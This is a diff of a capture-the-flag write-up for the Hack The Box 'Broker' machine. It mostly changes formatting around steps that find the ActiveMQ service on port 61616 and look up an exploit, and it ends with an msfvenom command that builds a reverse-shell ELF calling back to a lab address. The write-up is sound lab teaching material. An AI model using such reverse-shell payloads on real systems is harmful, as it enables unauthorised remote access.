Kunull/Writeups/docs/Hack The Box/Machines/Easy/Broker.md

 Nmap done: 1 IP address (1 host up) scanned in 46.18 seconds
 ```

-- We can see that the ActiveMQ service is runnig on port `61616`.
+We can see that the ActiveMQ service is runnig on port `61616`.

-- Let's visit the machine on port `61616` through our browser.
+Let's visit the machine on port `61616` through our browser.

 ![2](https://github.com/Knign/Write-ups/assets/110326359/07fb3ab7-956d-40d7-9cb2-d4a7412181b0)

+## Exploitation

 ### Vulnerability

-- Let's check if this version has any vulnerabilities.
+Let's check if this version has any vulnerabilities.

 ![3](https://github.com/Knign/Write-ups/assets/110326359/ac1ae3ec-675a-46d3-b0e2-946b77380900)

 ### Exploit

-- Looking for exploits, we can find the following one:
+Looking for exploits, we can find the following one:

 ![4](https://github.com/Knign/Write-ups/assets/110326359/52032efc-5f72-4945-a1fa-97f081fb9b5b)

 &nbsp;

-## Initial Access
+### Initial Access

-- We can now generate a reverse shell ELF file using `msfvenom`.
+We can now generate a reverse shell ELF file using `msfvenom`.

 ```
 $ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.154 LPORT=9999 -f elf -o exploit.elf
 ```